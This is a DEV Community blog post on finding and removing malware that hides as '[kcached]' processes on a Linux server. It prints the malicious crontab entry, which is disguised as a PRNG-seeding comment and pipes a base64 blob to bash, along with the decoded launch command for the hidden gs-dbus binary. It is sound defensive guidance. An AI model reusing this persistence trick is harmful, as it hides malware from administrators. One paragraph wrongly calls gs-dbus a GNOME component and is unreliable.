DEV Community

Henri Sekeladi
Henri Sekeladi

Posted on

How to deal with malicious kcached processes

https://alltime.pp.ua/blog/how-to-deal-with-malicious-kcached-processes/

If you find something like below on your server, be sure you’ve detected malicious activity.

username 2156075 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156076 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]
Enter fullscreen mode Exit fullscreen mode

You can use the lsof command to determine which processes have the files open and whether they are being used for legitimate purposes. If you are unsure about the legitimacy of these files or the processes using them, it may be helpful to consult with a qualified system administrator or security expert.

root@server1 [~]# lsof -p 2156075
Enter fullscreen mode Exit fullscreen mode
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156075 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156075 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156075 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus
Enter fullscreen mode Exit fullscreen mode

Here you go:

ls -1 /home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus*
/home/username/.config/dbus/gs-dbus.dat
Enter fullscreen mode Exit fullscreen mode

The files you see appear to be related to the gs-dbus process, which is a component of the GNOME software suite that manages D-Bus connections for graphical applications. The files in question are likely configuration files and data files used by this process.

It is not uncommon for these types of files to be owned by a user, especially if they are related to user-specific settings or configurations.

Inspect crontab of the given user:

root@server1 [~]# crontab -lu username
Enter fullscreen mode Exit fullscreen mode
# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-dbus-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel
Enter fullscreen mode Exit fullscreen mode

If you decode the base64 line you will see more:

/usr/bin/pkill -0 -U2438 gs-dbus 2>/dev/null || SHELL=/usr/local/cpanel/bin/noshell TERM=xterm-256color GS_ARGS="-k /home/username/.config/dbus/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/username/.config/dbus/gs-dbus'" 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

Recommendations:

– Don’t ignore the case
– kill the processes
– remove the files
– remove the cron
– reset all passwords for affected user
– scan account additionally using some good scanner
– notify the client

Do your career a big favor. Join DEV. (The website you're on right now)

It takes one minute, it's free, and is worth it for your career.

Get started

Community matters

Top comments (0)

AWS Security LIVE!

Tune in for AWS Security LIVE!

Join AWS Security LIVE! for expert insights and actionable tips to protect your organization and keep security teams prepared.

Learn More

👋 Kindness is contagious

Discover a treasure trove of wisdom within this insightful piece, highly respected in the nurturing DEV Community enviroment. Developers, whether novice or expert, are encouraged to participate and add to our shared knowledge basin.

A simple "thank you" can illuminate someone's day. Express your appreciation in the comments section!

On DEV, sharing ideas smoothens our journey and strengthens our community ties. Learn something useful? Offering a quick thanks to the author is deeply appreciated.

Okay